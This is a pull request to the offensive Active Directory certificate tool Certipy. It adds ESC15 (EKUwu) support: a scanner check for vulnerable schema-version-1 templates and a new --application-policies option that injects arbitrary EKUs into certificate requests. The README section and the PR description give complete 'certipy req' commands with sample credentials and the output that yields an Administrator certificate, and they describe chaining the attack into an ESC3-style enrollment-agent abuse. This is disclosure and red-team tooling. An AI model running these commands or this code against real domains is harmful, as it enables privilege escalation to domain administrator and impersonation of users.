### PR TITLE
ESC15/EKUwu PR

### DIFF
--- a/README.md
+++ b/README.md
@@ -826,7 +826,7 @@ ESC15 is when a certificate template has most of the primary conditions for ESC1
 However, the template does not have the 'Client Authentication' EKU. Example output of a vulnerable template would look like the following:
 
 ```bash
-  17
+  6
     Template Name                       : WebServer
     Display Name                        : Web Server
     Certificate Authorities             : CORP-DC-CA
@@ -845,9 +845,11 @@ However, the template does not have the 'Client Authentication' EKU. Example out
     Validity Period                     : 2 years
     Renewal Period                      : 6 weeks
     Minimum RSA Key Length              : 2048
+    Template Schema Version             : 1
     Permissions
       Enrollment Permissions
-        Enrollment Rights               : CORP.COM\Domain Admins
+        Enrollment Rights               : CORP.COM\Domain Users
+                                          CORP.COM\Domain Admins
                                           CORP.COM\Enterprise Admins
                                           CORP.COM\Authenticated Users
       Object Control Permissions
@@ -858,7 +860,8 @@ However, the template does not have the 'Client Authentication' EKU. Example out
                                           CORP.COM\Enterprise Admins
         Write Property Principals       : CORP.COM\Domain Admins
                                           CORP.COM\Enterprise Admins
-
+    [!] Vulnerabilities
+      ESC15                             : 'CORP.COM\\Domain Users' and 'CORP.COM\\Authenticated Users' can enroll, enrollee supplies subject and schema version is 1
 ```
 
 We can supply arbitrary Application Policies by using the `--application-policies` parameter.

--- a/README.md
+++ b/README.md
@@ -26,6 +26,7 @@ Certipy is an offensive tool for enumerating and abusing Active Directory Certif
       - [ESC8](#esc8)
       - [ESC9 & ESC10](#esc9--esc10)
       - [ESC11](#esc11)
+      - [ESC15](#esc15)
   - [Contact](#contact)
   - [Credits](#credits)
 
@@ -814,6 +815,88 @@ Certipy v4.7.0 - by Oliver Lyak (ly4k)
 [*] Saved certificate and private key to 'administrator.pfx'
 [*] Exiting...
 ```
+
+### ESC15
+
+ESC15 is when a certificate template has most of the primary conditions for ESC1, including:
+- The template permits low-privilege users to enroll.
+- The template permits the user to specify an arbitrary SAN.
+- The template is using Schema Version 1.
+
+However, the template does not have the 'Client Authentication' EKU. Example output of a vulnerable template would look like the following:
+
+```bash
+  17
+    Template Name                       : WebServer
+    Display Name                        : Web Server
+    Certificate Authorities             : CORP-DC-CA
+    Enabled                             : True
+    Client Authentication               : False
+    Enrollment Agent                    : False
+    Any Purpose                         : False
+    Enrollee Supplies Subject           : True
+    Certificate Name Flag               : EnrolleeSuppliesSubject
+    Enrollment Flag                     : None
+    Private Key Flag                    : AttestNone
+    Extended Key Usage                  : Server Authentication
+    Requires Manager Approval           : False
+    Requires Key Archival               : False
+    Authorized Signatures Required      : 0
+    Validity Period                     : 2 years
+    Renewal Period                      : 6 weeks
+    Minimum RSA Key Length              : 2048
+    Permissions
+      Enrollment Permissions
+        Enrollment Rights               : CORP.COM\Domain Admins
+                                          CORP.COM\Enterprise Admins
+                                          CORP.COM\Authenticated Users
+      Object Control Permissions
+        Owner                           : CORP.COM\Enterprise Admins
+        Write Owner Principals          : CORP.COM\Domain Admins
+                                          CORP.COM\Enterprise Admins
+        Write Dacl Principals           : CORP.COM\Domain Admins
+                                          CORP.COM\Enterprise Admins
+        Write Property Principals       : CORP.COM\Domain Admins
+                                          CORP.COM\Enterprise Admins
+
+```
+
+We can supply arbitrary Application Policies by using the `--application-policies` parameter.
+
+```bash
+certipy req -ca CORP-DC-CA -target-ip 192.168.4.178 -u 'user@corp.com' -p 'Password1' -template "WebServer" -upn "Administrator@corp.com" --application-policies 'Client Authentication'
+Certipy v4.8.2 - by Oliver Lyak (ly4k)
+
+[+] Trying to resolve 'CORP.COM' at '127.0.0.53'
+[+] Generating RSA key
+[*] Requesting certificate via RPC
+[+] Trying to connect to endpoint: ncacn_np:192.168.4.178[\pipe\cert]
+[+] Connected to endpoint: ncacn_np:192.168.4.178[\pipe\cert]
+[*] Successfully requested certificate
+[*] Request ID is 32
+[*] Got certificate with UPN 'Administrator@corp.com'
+[*] Certificate has no object SID
+[*] Saved certificate and private key to 'administrator.pfx'
+```
+
+You can also specify the Application Policy OID directly.
+
+```bash
+certipy req -ca CORP-DC-CA -target-ip 192.168.4.178 -u 'user@corp.com' -p 'Password1' -template "WebServer" -upn "Administrator@corp.com" --application-policies '1.3.6.1.5.5.7.3.2'
+Certipy v4.8.2 - by Oliver Lyak (ly4k)
+
+[+] Trying to resolve 'CORP.COM' at '127.0.0.53'
+[+] Generating RSA key
+[*] Requesting certificate via RPC
+[+] Trying to connect to endpoint: ncacn_np:192.168.4.178[\pipe\cert]
+[+] Connected to endpoint: ncacn_np:192.168.4.178[\pipe\cert]
+[*] Successfully requested certificate
+[*] Request ID is 33
+[*] Got certificate with UPN 'Administrator@corp.com'
+[*] Certificate has no object SID
+[*] Saved certificate and private key to 'administrator.pfx'
+```
+
 
 ## Contact
 

--- a/certipy/commands/find.py
+++ b/certipy/commands/find.py
@@ -736,6 +736,7 @@ class Find:
                 "pKIExtendedKeyUsage",
                 "nTSecurityDescriptor",
                 "objectGUID",
+                "msPKI-Template-Schema-Version"
             ],
             query_sd=True,
         )
@@ -830,7 +831,8 @@ class Find:
             "authorized_signatures_required": "Authorized Signatures Required",
             "validity_period": "Validity Period",
             "renewal_period": "Renewal Period",
-            "msPKI-Minimal-Key-Size": "Minimum RSA Key Length"
+            "msPKI-Minimal-Key-Size": "Minimum RSA Key Length",
+            "msPKI-Template-Schema-Version": "Template Schema Version"
         }
 
         if template_properties is None:
@@ -964,6 +966,18 @@ class Find:
                 vulnerabilities[
                     "ESC9"
                 ] = "%s can enroll and template has no security extension" % list_sids(
+                    enrollable_sids
+                )
+
+            # ESC15 Check: User can enroll, enrollee supplies subject, and schema version is 1
+            if (
+                user_can_enroll
+                and template.get("enrollee_supplies_subject")
+                and template.get("msPKI-Template-Schema-Version") == 1
+            ):
+                vulnerabilities[
+                    "ESC15"
+                ] = "%s can enroll, enrollee supplies subject and schema version is 1" % list_sids(
                     enrollable_sids
                 )
 

--- a/certipy/commands/parsers/req.py
+++ b/certipy/commands/parsers/req.py
@@ -5,12 +5,10 @@ from typing import Callable, Tuple
 
 from . import target
 
-
 def entry(options: argparse.Namespace):
     from certipy.commands import req
 
     req.entry(options)
-
 
 def add_subparser(subparsers: argparse._SubParsersAction) -> Tuple[str, Callable]:
     subparser = subparsers.add_parser(NAME, help="Request certificates")
@@ -31,7 +29,7 @@ def add_subparser(subparsers: argparse._SubParsersAction) -> Tuple[str, Callable
         "-subject",
         action="store",
         metavar="subject",
-        help="Subject to include certificate, e.g. CN=Administrator,CN=Users,DC=CORP,DC=LOCAL",
+        help="Subject to include in certificate, e.g. CN=Administrator,CN=Users,DC=CORP,DC=LOCAL",
     )
     group.add_argument(
         "-retrieve",
@@ -70,6 +68,13 @@ def add_subparser(subparsers: argparse._SubParsersAction) -> Tuple[str, Callable
         "-renew",
         action="store_true",
         help="Create renewal request",
+    )
+    group.add_argument(
+        "--application-policies",
+        action="store",
+        nargs='+',
+        metavar="Application Policy",
+        help="Specify application policies for the certificate request using OIDs (e.g., '1.3.6.1.4.1.311.10.3.4' or 'Client Authentication')"
     )
 
     group = subparser.add_argument_group("output options")

--- a/certipy/commands/req.py
+++ b/certipy/commands/req.py
@@ -37,6 +37,7 @@ from certipy.lib.formatting import print_certificate_identifications
 from certipy.lib.logger import logging
 from certipy.lib.rpc import get_dce_rpc
 from certipy.lib.target import Target
+from certipy.lib.constants import OID_TO_STR_MAP
 
 from .ca import CA
 
@@ -67,7 +68,7 @@ class DCERPCSessionError(rpcrt.DCERPCException):
         return "RequestSessionError: %s" % error_msg
 
 
-# https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-wcce/d6bee093-d862-4122-8f2b-7b49102097dc
+# Define NDR structures for CertServerRequest and Response
 class CERTTRANSBLOB(NDRSTRUCT):
     structure = (
         ("cb", ULONG),
@@ -75,7 +76,6 @@ class CERTTRANSBLOB(NDRSTRUCT):
     )
 
 
-# https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-icpr/0c6f150e-3ead-4006-b37f-ebbf9e2cf2e7
 class CertServerRequest(NDRCALL):
     opnum = 0
     structure = (
@@ -87,7 +87,6 @@ class CertServerRequest(NDRCALL):
     )
 
 
-# https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-icpr/0c6f150e-3ead-4006-b37f-ebbf9e2cf2e7
 class CertServerRequestResponse(NDRCALL):
     structure = (
         ("pdwRequestId", DWORD),
@@ -148,7 +147,7 @@ class RPCRequestInterface(RequestInterface):
         request["pctbAttribs"] = empty
         request["pctbRequest"] = empty
 
-        logging.info("Rerieving certificate with ID %d" % request_id)
+        logging.info("Retrieving certificate with ID %d" % request_id)
 
         response = self.dce.request(request, checkError=False)
 
@@ -539,6 +538,7 @@ class Request:
         scheme: str = None,
         dynamic_endpoint: bool = False,
         debug=False,
+        application_policies: List[str] = None,
         **kwargs
     ):
         self.target = target
@@ -556,6 +556,9 @@ class Request:
         self.renew = renew
         self.out = out
         self.key = key
+        self.application_policies = [
+            OID_TO_STR_MAP.get(policy, policy) for policy in (application_policies or [])
+        ]
 
         self.web = web
         self.port = port
@@ -667,6 +670,13 @@ class Request:
             with open(self.pfx, "rb") as f:
                 renewal_key, renewal_cert = load_pfx(f.read())
 
+        converted_policies = []
+        for policy in self.application_policies:
+            oid = next((k for k, v in OID_TO_STR_MAP.items() if v.lower() == policy.lower()), policy)
+            converted_policies.append(oid)
+        
+        self.application_policies = converted_policies
+
         csr, key = create_csr(
             username,
             alt_dns=self.alt_dns,
@@ -676,6 +686,7 @@ class Request:
             key_size=self.key_size,
             subject=self.subject,
             renewal_cert=renewal_cert,
+            application_policies=self.application_policies
         )
         self.key = key
 
@@ -704,6 +715,7 @@ class Request:
 
             csr = create_on_behalf_of(csr, self.on_behalf_of, agent_cert, agent_key)
 
+        # Construct attributes list
         attributes = ["CertificateTemplate:%s" % self.template]
 
         if self.alt_upn is not None or self.alt_dns is not None:
@@ -714,6 +726,10 @@ class Request:
                 san.append("upn=%s" % self.alt_upn)
 
             attributes.append("SAN:%s" % "&".join(san))
+
+        if self.application_policies:
+            policy_string = "&".join(self.application_policies)
+            attributes.append(f"ApplicationPolicies:{policy_string}")
 
         cert = self.interface.request(csr, attributes)
 

--- a/certipy/commands/req.py
+++ b/certipy/commands/req.py
@@ -68,14 +68,14 @@ class DCERPCSessionError(rpcrt.DCERPCException):
         return "RequestSessionError: %s" % error_msg
 
 
-# Define NDR structures for CertServerRequest and Response
+# https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-wcce/d6bee093-d862-4122-8f2b-7b49102097dc
 class CERTTRANSBLOB(NDRSTRUCT):
     structure = (
         ("cb", ULONG),
         ("pb", PBYTE),
     )
 
-
+# https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-icpr/0c6f150e-3ead-4006-b37f-ebbf9e2cf2e7
 class CertServerRequest(NDRCALL):
     opnum = 0
     structure = (
@@ -86,7 +86,7 @@ class CertServerRequest(NDRCALL):
         ("pctbRequest", CERTTRANSBLOB),
     )
 
-
+# https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-icpr/0c6f150e-3ead-4006-b37f-ebbf9e2cf2e7
 class CertServerRequestResponse(NDRCALL):
     structure = (
         ("pdwRequestId", DWORD),


### PR DESCRIPTION
Initial PR of ESC15 attack discovered and disclosed by Justin Bollinger from TrustedSec (https://x.com/Bandrel)

Edit: Here are some additional details about the attack.

As other people have noted, this is essentially ESC1 without the need to have a "Client Authentication" EKU. I didn't RE all of the binaries/libraries associated with Windows ADCS (I tried, but it's a lot) - so I don't have a clear picture on all of the internals that lead to this specific edge case. I am able to surmise that this is possible for a few different reasons:

1. Schema Version 1 templates do not contain a populated `msPKI-Certificate-Application-Policy` (https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-crtd/44012f2d-5ef3-440d-a61b-b30d3d978130) attribute whereas templates with version 2+ have it populated automatically. If you delete that attribute on a version 2+ template, you'll actually find it vulnerable to multiple ESC bug classes.
2. Only templates where enrollee supplies SAN are vulnerable (in my testing). It appears that you can only supply the application policies extension on a request where you are already providing a SAN. While trying to supply EKU on certificate templates that do not support enrollee supplied SAN, the supplied application policy extension does not stay populated on the requested certificate.
3. These requested certificates do not support PKINIT out of the box. However, you can essentially conduct an ESC3-style attack by just supplying the `Certificate Enrollment Agent` EKU via ESC15 and request a `User` certificate template to address that hurdle.

This is not something that is vulnerable default, like many other ADCS vulnerabilities. You have to go out of your way to create a vulnerable condition. Microsoft's own documentation does not recommend ever configuring a certificate in this way and they actually would advise against it. However, other vendors/third-parties are not as scrupulous. Here are a few interesting examples I found during my research into this vulnerability:

- https://www.firewall.cx/operating-systems/microsoft/windows-servers/how-to-enaable-webserver-certificate-template.html
- https://bgelens.nl/integrating-vm-role-with-desired-state-configuration-part-2-pki/
- https://deskalertssupport.zendesk.com/hc/en-us/articles/19299662937107-How-to-create-an-SSL-certificate-using-Active-Directory-Certificate-Services

I've had over a month working with this fork and during the testing of several client organization, found instances where a vulnerable certificate template was available - typically the `WebServer` template and I believe it because of the proliferation of bad third-party vendor documentation.

Honorable mentions: TrustedSec released their internal BOF that also exploits this vulnerability. You can snag it from https://github.com/trustedsec/CS-Remote-OPs-BOF 